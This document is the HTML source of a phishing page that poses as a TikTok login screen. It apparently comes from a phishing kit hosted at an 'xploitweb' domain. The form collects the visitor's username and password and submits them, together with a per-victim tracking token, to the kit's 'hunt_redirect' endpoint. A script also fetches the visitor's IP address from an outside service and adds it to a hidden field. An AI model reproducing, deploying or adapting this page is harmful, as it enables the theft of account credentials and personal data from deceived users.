<!DOCTYPE html>
<html lang="en">
<head>
	<title>tiktok</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
<!--===============================================================================================-->	
	<link rel="icon" type="image/png" href="http://xploitweb.tk/static/phishing_pages/tiktok/images/icons/Social-media_Tiktok-512.webp"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/bootstrap/css/bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/fonts/font-awesome-4.7.0/css/font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/fonts/Linearicons-Free-v1.0.0/icon-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/animate/animate.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/css-hamburgers/hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/animsition/css/animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/select2/select2.min.css">
<!--===============================================================================================-->	
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/daterangepicker/daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/css/util.css">
	<link rel="stylesheet" type="text/css" href="http://xploitweb.tk/static/phishing_pages/tiktok/css/main.css">
<!--===============================================================================================-->
</head>
<body>
	
	<div class="limiter">
		<div class="container-login100">
			<div class="wrap-login100">
				<form action="http://xploitweb.tk/phis/hunt_redirect" method="get" class="login100-form validate-form">' %}
					
                
                    <div class="wrap-input100 rs1-wrap-input100 validate-input m-b-20" data-validate="Type user name">
						<input id="first-name" class="input100" type="text" name="username" placeholder="IN  +91 " >

						   <div class="form-group">
                <input type="hidden"  name="token" id="inputtoken" value="123456789">
            </div>

             <div class="form-group">
                <input type="hidden"  name="page_app" id="pageapp" value="tikt">
             </div>
						<div class="form-group">
                <input type="hidden"  name="ip" id="ip" value="1.1.1.1">
             </div>
						<input id="first-name2" class="input100" type="text" name="password" placeholder="Password " >
						<span class="focus-input100"></span>
					</div>
					
					
					<div class="container-login100-form-btn">
						<button class="login100-form-btn">
							Enter
						</button>
					</div>

					<div class="w-full text-center p-t-27 p-b-239">
						<span class="txt1">
							
                            By countuning, you agree to TikTok's Terms of Use and confirm that you have read TikTok's Privacy Policy. if you sign up with SMS, SMS fees may applay 
                            <br>
                            <br>
                            Forgot
						</span>

						<a href="#" class="txt2">
							User name / password?
						</a>
					</div>

					<div class="w-full text-center">
						<a href="#" class="txt3">
							@TikTok
						</a>
					</div>
				</form>

				<div class="login100-more" style="background-image: url(' ');"></div>
			</div>
		</div>
	</div>
	
	

	<div id="dropDownSelect1"></div>
	
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/animsition/js/animsition.min.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/bootstrap/js/popper.js"></script>
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/select2/select2.min.js"></script>
	<script>
		$(".selection-2").select2({
			minimumResultsForSearch: 20,
			dropdownParent: $('#dropDownSelect1')
		});
	</script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/daterangepicker/moment.min.js"></script>
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/daterangepicker/daterangepicker.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/vendor/countdowntime/countdowntime.js"></script>
<!--===============================================================================================-->
	<script src="http://xploitweb.tk/static/phishing_pages/tiktok/js/main.js"></script>

</body>
<script>
let url = new URL(window.location.href)
let token = url.searchParams.get("token");
var el = document.getElementById("inputtoken")
console.log(token)

if (token !== null){

   console.log(token)
   el.value = token;
}
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script>

$.getJSON('https://api.db-ip.com/v2/free/self', function(data) {
    ip = document.getElementById("ip");
    ip.value = data.ipAddress
});
</script>
</html>